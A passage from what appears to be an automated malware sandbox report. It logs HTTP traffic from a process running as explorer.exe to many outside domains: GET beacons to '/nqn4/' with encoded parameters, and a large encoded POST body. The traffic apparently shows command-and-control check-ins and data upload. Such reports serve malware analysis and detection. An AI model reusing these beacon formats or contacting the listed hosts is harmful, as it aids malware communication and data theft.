6a 6d 6b 66 53 30 6a 34 62 48 33 61 77 6f 65 34 55 65 5f 52 79 41 2d 64 5f 42 37 75 79 72 5f 77 59 58 4f 39 47 6a 42 6a 79 32 66 6c 70 6e 74 56 32 6b 77 67 6f 31 78 78 6b 66 56 6a 4c 54 59 5a 6b 47 37 7a 6e 4d 6d 45 57 33 4a 49 50 66 34 55 6b 30 44 46 61 59 50 48 61 78 6f 66 33 56 7a 46 6f 4a 78 58 50 51 52 6e 79 6e 63 76 49 51 39 59 5a 4d 64 52 7a 30 39 4f 4e 56 6b 45 4a 4c 48 36 7a 36 4d 48 39 49 63 43 39 61 68 73 5f 75 78 70 36 4c 32 73 38 52 62 62 45 7a 6e 45 68 4c 54 4c 37 77 72 45 79 7e 78 79 4c 47 2d 75 73 4e 73 76 6d 37 68 78 61 47 70 4a 56 4e 4a 42 75 6e 4a 72 43 33 57 30 48 68 4e 61 68 64 35 37 30 43 39 68 35 6b 6e 46 73 62 46 76 5f 69 66 6d 49 34 47 7a 39 76 58 31 6e 6d 38 4c 48 38 52 79 57 5a 6d 58 67 6a 6c 54 63 64 6d 49 54 46 41 33 32 75 7a 66 33 50 37 6d 73 6c 78 4b 65 69 50 44 43 41 4a 36 58 69 56 58 58 61 6b 28 4d 34 48 68 54 35 36 6b 57 6e 75 79 50 30 45 7e 47 5a 7a 67 4c 34 71 63 67 51 67 41 70 51 4b 6c 30 32 35 73 31 4b 79 75 66 4e 48 6c 57 44 48 48 74 33 38 78 30 63 71 6b 38 4f 64 53 41 61 57 6e 57 4d 71 7a 55 37 77 65 62 68 68 44 33 4d 76 52 4d 67 6a 70 6b 58 41 44 48 49 7a 71 68 61 6c 76 70 73 4c 77 55 31 61 50 42 50 46 64 62 44 47 49 58 63 57 44 57 7e 7a 65 73 59 6c 74 69 50 61 7a 5f 53 5a 6e 5f 48 39 73 32 53 46 56 41 32 6f 77 6e 65 46 6f 73 66 4f
                                                                                          Data Ascii: T2MpwT=gYT1G1E0SnTQIyqsBaA-FYIeGEAc0osM(m6VgBbDXObLVcfcVc(WElT0yBY912kbqNEPakuAcZW2tdAHM0fhdOOrnUoKv_wPboBhoF~kegQwroyi1K91yfDeXNZelfXtV11D38zUjyaghrCEfX6mMNGySEb5dRhuElsbYX7II3krKRx2lRI8qSLXeN4akF8e3UHaUkcnFFtw1eyEVXOM7LqLgsw8prLXDX9kmfJFRNtsqU8w7-bl3KTn~hZ3SRlyqK4Ovrr-yKQqhAFUPNxasEXaXVnlha2x8uCwJnhyVMzg6EGlJBTleU5SpiERmJB1GHFJyMv4qpjjNLUz8CpEnGOakCi4GL2yeU5OK7S-2T4xM-ap772i03Xa6Ev0w_5qYCPJ(mZWJPAYZv8PHEGU2zW2L4CRarzNyFdhEc(ZLvG9qg1mF7CZG4(YEniRXDqiggT8AIg1~2CylNI0YcxQthahuo~TFCUJk6KU1OGXiw(2ceAxXyVDo1eDnienbOPFRSJ9jfPYo-CqBFpWB-9pm-oP59v5qxFnV5u-M6667Ouc1mOG0mmMghpEBndUdFKYbSHWaz58LiUBEc(aS9etIgoJb8ESfn89qlO6NMXV(buKCYRyarX_2oX9L9r31tbz~5T_UiZb4V~n8HiEoT3OjxVQbs1gMc~FhGHs(ys6YR9mFInY(5XTNgLymxJ3RJ4mK-7VCupjIuphZVXxuXAmcm6HND0XFQ0iCJTrFIhqfVlNCwJTgKwB3iew(7G00Zvo(Dv5N3jMnxCxjWATcE7G7BFDR96j9MRaumPnFWU3Z1itprSOf3hg7rNSowqZlDSlQ8K2o5FKVC3U5Mv1SiKlhVEl4Rc4dV~7LG3LmaX1NtzvqEIT1ZF41RKHqjIhuiJjNAoZU7gLM9ROJeigB0rAFNCWgoXt~jmkfS0j4bH3awoe4Ue_RyA-d_B7uyr_wYXO9GjBjy2flpntV2kwgo1xxkfVjLTYZkG7znMmEW3JIPf4Uk0DFaYPHaxof3VzFoJxXPQRnyncvIQ9YZMdRz09ONVkEJLH6z6MH9IcC9ahs_uxp6L2s8RbbEznEhLTL7wrEy~xyLG-usNsvm7hxaGpJVNJBunJrC3W0HhNahd570C9h5knFsbFv_ifmI4Gz9vX1nm8LH8RyWZmXgjlTcdmITFA32uzf3P7mslxKeiPDCAJ6XiVXXak(M4HhT56kWnuyP0E~GZzgL4qcgQgApQKl025s1KyufNHlWDHHt38x0cqk8OdSAaWnWMqzU7webhhD3MvRMgjpkXADHIzqhalvpsLwU1aPBPFdbDGIXcWDW~zesYltiPaz_SZn_H9s2SFVA2owneFosfOR_uH0JTflOj5SByBwytIppx8DwihGWYWbMQ1~xDLCVNQzkQuWs4kI2Wy7spF8v5pgvG4jOghd930uCZT6Jm0XG0fLfkIft1i8xRwYlC7oVwW~BnRgVJqTpcTs-46c1eM8RdCp5XcO3KCXjyMrYhCWdRfNiiDawpp~F8T69RFogfcSuC5tKWaAZZofrL3Bxje2rMAry(Xgys3sWraNO2N(5QAt-ES8wsg6MHWJ9KCf3o1JvqHtrLQeSKPGiTUQazG9sl2ADTZWC6uM7dE1oiQjre9o7OyL9o_GOAzgrA0KuEntCxkojg6VvoXI3TBFAaSJbO4KkLXJtttHLvAaMVcrAtic4zp52EvIcTkO90SBl8bLjuGrVloaL~aJ96eJKjMIbYh5bkYGW1Q(hzSfG7eAiOLKgRP3q9plgrOfmHA~bo_lq4_jrDTk3PI(_iSQobuYp7MFyfT5SSV3hb5mPIPrAob6v8sgAI72PmrK3GskuPl37uR2R(znKfgaFg7VHPI3WWvzUOINYBZcfnGkzoL2gkBmENU6Gv-0SDoXb99hrphTQNYE921QoBNnOK1VepAzYJzFnme02EK1AJo7f4wNhFyUv(5sGS2F8FoynLFZ_t1gMt8pYsnTxUoT9cKp-BOFcQbgNwiOjFT6oUCG9Jod6(nvgv2TpzHdeWhtqov5AkACnQ-xPyf0ADOdIunHtImjXcsCghIFEkbztNeL96biuq3u7XQTnm0KsemdLREkHPzmMwniFDCKfKovwPe(SabxjMeGAVe0hp2MKcAqwrla5SjVuZlAFWc~IIsU-L_ImyFmnItwIS2b8fVZqrUVmIdpyyVQNvhSVffJgJIZ0Q3MTgVf7CYqU1T7YflLqPI6IqiE51-dIbo0Cc7wQG-isAZw2OwT-VRg2sGKZF7vPV8fhN4ZpIEAaJP(5xz5hHJrne1U1tFHjwxzgKnDMxSeYDy105tJvbRUz4ROZRrFdwnESWTXqv5FaLTyqYI80QDvI9hPP~_Gd8q8ffZGt7lj1KJR4tDofmnoOTlqlmv4MbUW0~yOWlVUjGk0RnXI8z8eLxIR4kPHKbh7h5yBWxNiBWJQOaYVisJNqyD~xLKCBtEYcLrDfz4GVVvTE(W~pRRfx2cagW169KuggJO4iY10DbCS_0iZxhoyxaI3JzbGd58OWTrotM9CBqFBzdLw4UWH1T0gimrrYTxgMOHjqcvAhkaMWpCY6BAQ0ZQcmeYkljwOmF8oFB260JmmNUOHA4OkcWA(P29fm6VtU(osZetmT1wHO07Iz66WWLyczQZqVVDcLiaHqWbM_2gDqHBFCWWPS8rB4obD4ipVJTZIvI1wgMl3oIVeRAcSQeHmm6JnJZ0D7bM67X01sLEEAPc6nJqdxQAEwKZEBpukFvNBr7UhlsfQAqP1vFhVRT9HRqdEVeyawYz1gXnU4B4W2OYdxxdVBC1CTzYpo21WPkxk6glWICkCVw7jgPXNayYwlAqOtJZWCwjiZtusutnW3EVp2iLH1AcxlSx48WiHdzqjXyaADdAMmkJAyPbRsWUN8(-W_BEMH6abvkXRyD4qoc5cIPM7l(Q1MT0KOAoNn(QxuSNi-2XEOLBydV-Ws(6qcB8h3ZV9Ogw71pGBF(i~0wWnbkuBIy3cnMW8po412rWGBFKnstnbCihyGW-(y80auXl7bohZHnIYgaDCjeGvQOvNgc2Jxn69AyE4vmNv2DvMhJhrF7RasfthXqJ2fbVgu(gaR6p9AIuYLvxkdPIvdzfaJjkD3FXdcBGKf8TaxdT(MDcqIG2PJGaGSU9kJxoWz0QJkDkiapl~QBz4yZU17OLbMFsT9oXI3a9Y6e4eS55NhvC0pAibQ9JSm6yXQWcgqP2pfu-iOd0fYQcgTBGbShz61PuAw3SxL2p1XN1W_sE~QgUX4NaQIefnIEARE~D0jyx1WtMqd(-XhRy~bU4Njhp5r~JjrvBxhLMlo8AOREHHAt8Ln9c2MQleAvbiQVb5OHGIz(PsOkd0SZsqyCwFZMUEf4D2d9vliAMrOtUqg9fFL1eNOcmtL564xfAnVFf(om4MOtS8m1ryfdIO6qmz_BFlJF2LuMdiJK5yd~18DSmUuQG9JeARHeLc3NDGkJvtwZndi2J9QdoLZ~C(BfUuXd0YuK6VsOvp9MSz6nlxT~3joqOGFYLZvdSjayNefLefrqcbmDfxjb8JPXzUOxNadnmlDyA91IwhwnrmAKlLnVNjq80ng9_3vtc1Jef5VwfuByTvcaekghrxgPBtUunFVeOznn0p9tefrVvuTU1pg0a26kFoVbAstMr69KmJ7EwyGREm3xJBu4BLyt-~GmC20FSQICOh7JbAfkawK9OfB2DqApcP-sxOI3jnkml8SsmHBlGRBq0URv_4XA6bBpTUfNFIqQyDc1gK4phyigUixJcM5gb7LYMQbrj2ON68dPQJt8yr9Fq5NIj3DnmXGeOY60wkf0OpUeycLWRudPIhY5tqoMCIqhnYODJ1WTK9GwJYSgA4jSpDGoevn5SbTDPDCF9aYrE(0zAPtSQpvTPvsTiy4Yloqd0yaFzbgv-bZxSUOpm9ngL5P1wmIQd(S3IpLxZKHWl0CcMVttejQ0du6wVBeJlbsbB~ZCrqoRXxzBMKEyNriL6r2MdsCMRMdGq9cuGK3rX1rt7CK3oBsDSatiBHcYBbzt_ss15orfHfT1MhRJKHpEyIxZbjaMR0gRZ(5R
                                                                                          Oct 8, 2021 10:04:06.283411980 CEST5978OUTData Raw: 4d 74 71 6b 31 6e 75 57 7a 55 62 34 6d 38 58 56 28 73 5a 35 6f 53 6d 41 62 33 58 71 4b 52 6c 4d 30 63 54 42 6b 37 73 5f 44 6d 59 62 38 2d 66 35 45 41 6f 67 6d 72 45 41 6c 6c 61 38 35 4e 4b 31 78 75 28 61 70 78 28 65 67 45 30 50 4b 56 34 57 62 68
                                                                                          Data Ascii: Mtqk1nuWzUb4m8XV(sZ5oSmAb3XqKRlM0cTBk7s_DmYb8-f5EAogmrEAlla85NK1xu(apx(egE0PKV4WbhaolRTWjMIkdD8reFoEP8BXtWevxfo9dE2DjTqlipX5Tro3vIoHGpOl0u~klNaOpcAK5o2UEtzCxfkB8s3EnIG2aMahbWvg9y2S5rs058yyrmJlZgEFo8KGXo0LHRqrZPK6OCQZJel3933iWtiiaQ27DYjMpe1VjQ(
                                                                                          Oct 8, 2021 10:04:06.283529043 CEST5998OUTData Raw: 4c 64 48 45 59 39 57 45 5a 6e 59 6d 33 63 37 4c 59 2d 6a 54 6d 7a 62 7a 36 48 79 4a 62 35 47 66 6d 54 73 7a 44 69 55 65 56 6b 6a 5f 4e 64 73 6e 70 42 4e 5a 6d 51 6c 6a 34 68 77 4e 77 63 41 61 6a 58 41 65 6a 6d 54 7a 49 43 75 77 51 76 59 36 4d 72
                                                                                          Data Ascii: LdHEY9WEZnYm3c7LY-jTmzbz6HyJb5GfmTszDiUeVkj_NdsnpBNZmQlj4hwNwcAajXAejmTzICuwQvY6MrASM3AeQ_LHs_zxMVAADuCoJSwmDPK11B4NjD6Y23W5nnOtU77ZesPRKkKm2g9kxb6bD2TQqw0tF1Zw94a9tZNN50gTAiS7xV6vU-JbKQs2mYuRT3b5L0pcYvRvvLjbgfeD4br3FSl6dOGkrztMHBWzKdNkPGxniZP
                                                                                          Oct 8, 2021 10:04:06.567539930 CEST5999INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:04:06 GMT
                                                                                          Server: Apache
                                                                                          Location: http://dfltweb1.onamae.com
                                                                                          Content-Length: 210
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          25192.168.2.349890150.95.255.3880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:04:06.289716005 CEST5999OUTGET /nqn4/?T2MpwT=vanPYQUuZ3XFRC7SYcRcV+oaGEE9ir47lHLJmRrDHNXTaYXBSumhPRu6vjoy21MSp9tX&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.eco1tnpasumo3.xyz
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:04:06.579243898 CEST6000INHTTP/1.1 302 Found
                                                                                          Date: Fri, 08 Oct 2021 08:04:06 GMT
                                                                                          Server: Apache
                                                                                          Location: http://dfltweb1.onamae.com
                                                                                          Content-Length: 210
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 66 6c 74 77 65 62 31 2e 6f 6e 61 6d 61 65 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://dfltweb1.onamae.com">here</a>.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          3192.168.2.34986134.102.136.18080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:15.459021091 CEST5797OUTGET /nqn4/?T2MpwT=eKIp1y2l1SOv2+qM13sD3ni05izmwIgUfk+SveOGf2fPDQ1ngTqk3VQOR6nY8FES9U2Z&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.palisadestahoeresorts.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:15.572705030 CEST5797INHTTP/1.1 403 Forbidden
                                                                                          Server: openresty
                                                                                          Date: Fri, 08 Oct 2021 08:01:15 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 275
                                                                                          ETag: "615f9602-113"
                                                                                          Via: 1.1 google
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          4192.168.2.349863198.37.103.7080C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:21.000360012 CEST5805OUTGET /nqn4/?T2MpwT=j/acvWTIX1IIGG71msTYH2BmWHO6PBbUk8yOFfU9QnNmzI6YXFgStfXcNuKpZIImGkZw&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.cmledbetter.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:21.281112909 CEST5805INHTTP/1.1 301 Moved Permanently
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                          X-Redirect-By: WordPress
                                                                                          Location: http://cmledbetter.com/nqn4/?T2MpwT=j/acvWTIX1IIGG71msTYH2BmWHO6PBbUk8yOFfU9QnNmzI6YXFgStfXcNuKpZIImGkZw&VDK0L=5jZhjDchE
                                                                                          X-Litespeed-Cache: miss
                                                                                          Content-Length: 0
                                                                                          Date: Fri, 08 Oct 2021 08:01:21 GMT
                                                                                          Server: LiteSpeed


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          5192.168.2.349864155.159.216.3780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:27.060571909 CEST5806OUTGET /nqn4/?T2MpwT=NO7HiJjWp23E/NVr6f5oxbZpLiVezzkACgfnzaC9yrbwkfp2XaPNKLC9V4BmJOtFaRlB&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.qgt114.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:27.364960909 CEST5806INHTTP/1.1 500 Server Error
                                                                                          Server: nginx
                                                                                          Date: Fri, 08 Oct 2021 08:01:27 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Data Raw: 66 0d 0a 0a 65 6d 70 74 79 20 72 65 73 70 6f 6e 73 65 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: fempty response0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          6192.168.2.349866167.172.158.20280C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:32.538326025 CEST5816OUTGET /nqn4/?T2MpwT=vamNjrgbVY8P7naByDvhT5uBlUfF4mww4F7uwpIcOdwQ9dI2x1NbU7t9TbuGfOUGmVqs&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.serenityminded.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:33.134924889 CEST5816INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Fri, 08 Oct 2021 08:01:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          X-UA-Compatible: IE=edge
                                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                          X-Redirect-By: WordPress
                                                                                          Location: http://serenityminded.com/nqn4/?T2MpwT=vamNjrgbVY8P7naByDvhT5uBlUfF4mww4F7uwpIcOdwQ9dI2x1NbU7t9TbuGfOUGmVqs&VDK0L=5jZhjDchE
                                                                                          Vary: Accept-Encoding
                                                                                          Age: 0
                                                                                          X-Cache: MISS


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          7192.168.2.3498675.77.41.13680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Oct 8, 2021 10:01:38.144500971 CEST5817OUTGET /nqn4/?T2MpwT=vhYC9jp4QxyX9P9jU1kmIMvJN+CriLjGecmH3lCQz9Uj4oO69oLOp3ieJLqJz40Fbqlq&VDK0L=5jZhjDchE HTTP/1.1
                                                                                          Host: www.alhudadevelopers.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Oct 8, 2021 10:01:38.183650017 CEST5819INHTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-Powered-By-Plesk: PleskWin
                                                                                          Date: Fri, 08 Oct 2021 08:01:37 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 12579
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 73 74 79 6c 65 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 79 3a 73 63 72 6f 6c 6c 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 3a 34 30 30 20 36 32 2e 35 25 2f 31 2e 34 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 6d 73 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 2c 68 74 6d 6c 7b 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 72 65 6d 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 61 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 34 39 38 65 33 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 61 3a 61 63 74 69 76 65 2c 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 63 6f 6c 6f 72 3a 23 31 38 38 64 64 39 3b 6f 75 74 6c 69 6e 65 3a 30 7d 68 31 2c 68 32 7b 6d 61 72 67 69 6e 3a 30 20 30 20 2e 35 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 34 34 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 72 65 6d 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 36 72 65 6d 7d 2e 65 72 72 6f 72 2d 63 6f 64 65 7b 63 6f 6c 6f 72 3a 23 66 34 37 37 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 38 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 7d 70 7b 6d 61 72 67 69 6e 3a 31 2e 32 72 65 6d 20 30 7d 70 2e 6c 65 61 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 72 65 6d 3b 63 6f 6c 6f 72 3a 23 34 66 35 61 36 34 7d 68 72 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 68 65 69 67 68 74 3a 30 3b 6d 61 72 67 69 6e 3a 32 2e 34 72 65 6d 20 30 3b 62 6f 72 64 65 72 3a 30 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 7d 2e 70 61 67 65 7b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 70 61 67 65 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 63 6f 6e 74 65 6e 74 3a 27 27 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 66 6c 65 78 3a 30
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="x-ua-compatible" content="ie=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <title>404 Not Found</title> <style>html{overflow-y:scroll;color:#000;font:400 62.5%/1.4 "Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%;-webkit-tap-highlight-color:transparent}body,html{height:100%;min-height:100%}body{margin:0;font-size:1.3rem;background:#fff;color:#000}a{cursor:pointer;text-decoration:none;color:#2498e3;background-color:transparent}a:active,a:hover{text-decoration:underline;color:#188dd9;outline:0}h1,h2{margin:0 0 .5rem;color:#444;font-weight:400;line-height:1}h1{font-size:2.4rem}h2{font-size:3.6rem}.error-code{color:#f47755;font-size:8rem;line-height:1}p{margin:1.2rem 0}p.lead{font-size:1.6rem;color:#4f5a64}hr{box-sizing:content-box;height:0;margin:2.4rem 0;border:0;border-top:1px solid #ddd}.page{display:-webkit-box;display:-ms-flexbox;display:flex;min-height:100vh}.page:before{display:block;content:'';-webkit-box-flex:0
                                                                                          Oct 8, 2021 10:01:38.183718920 CEST5820INData Raw: 3b 2d 6d 73 2d 66 6c 65 78 3a 30 20 31 20 34 37 34 70 78 3b 66 6c 65 78 3a 30 20 31 20 34 37 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 33 38 34 34 34 66 20 35 30 25 20 36 65 6d 20 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64
